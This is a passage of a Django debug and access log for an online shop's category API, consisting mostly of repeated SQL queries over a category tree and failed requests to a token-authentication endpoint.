"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:01:04,855 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:01:04,858 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:01:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:01:05] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:01:05] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:01:08,947 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:01:08] "OPTIONS /api-token-auth/ HTTP/1.0" 404 1751 DEBUG 2019-12-27 07:01:30,866 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:01:30] "GET /api-token-auth/ HTTP/1.0" 404 1747 Not Found: /api/api-token-auth/ [27/Dec/2019 07:01:38] "GET /api/api-token-auth/ HTTP/1.0" 404 6480 DEBUG 2019-12-27 07:01:48,368 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) DEBUG 2019-12-27 07:01:48,377 utils 4252 140031732287232 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:01:48.374410+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 7, 1, 48, 374410, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 07:01:48,402 utils 4252 140031732287232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:01:48.400431+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 1, 48, 400431, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') Not Found: /api/v1/api-token-auth/ [27/Dec/2019 07:01:48] "GET /api/v1/api-token-auth/ HTTP/1.0" 404 5461 [27/Dec/2019 07:01:48] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [27/Dec/2019 07:01:48] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [27/Dec/2019 07:01:48] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [27/Dec/2019 07:01:48] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [27/Dec/2019 07:01:48] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [27/Dec/2019 07:01:49] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [27/Dec/2019 07:01:49] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [27/Dec/2019 07:01:49] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [27/Dec/2019 07:01:49] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [27/Dec/2019 07:01:49] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [27/Dec/2019 07:01:50] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 DEBUG 2019-12-27 07:04:06,653 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:04:06] "GET /api-token-auth/ HTTP/1.0" 404 1747 [27/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:08:22] "POST /api-token-auth/ HTTP/1.0" 403 2868 DEBUG 2019-12-27 07:09:04,432 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:09:04,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:09:04,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:09:04,446 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:09:04,451 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:09:04,454 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:09:04,457 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:09:04,459 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:09:04,462 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:09:04,466 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:09:04,469 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:09:04,472 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:09:04,474 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:09:04,477 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:09:04,480 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:09:04,482 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:09:04,484 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:09:04,486 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:09:04,489 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:09:04,492 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:09:04,494 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:09:04,497 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:09:04,499 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:09:04,501 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:09:04,504 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:09:04,507 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:09:04,514 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:09:04,516 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:09:04,519 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:09:04,521 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 07:09:04,526 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:09:04,529 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:09:04,530 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:09:04,537 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) [27/Dec/2019 07:09:04] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 07:09:04,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:09:04,542 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:09:04,544 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:09:04,548 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:09:04,550 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:09:04,552 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:09:04,554 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:09:04,557 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:09:04,559 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:09:04,562 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:09:04,564 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:09:04,566 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:09:04,569 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:09:04,571 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:09:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:09:19] "POST /api-token-auth/ HTTP/1.0" 403 2868 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:09:36] "POST /api-token-auth/ HTTP/1.0" 403 2868 [27/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [27/Dec/2019 07:11:34] "GET /index.asp HTTP/1.0" 404 6448 DEBUG 2019-12-27 07:12:44,131 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:12:44,143 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:12:44,149 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:12:44,153 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", 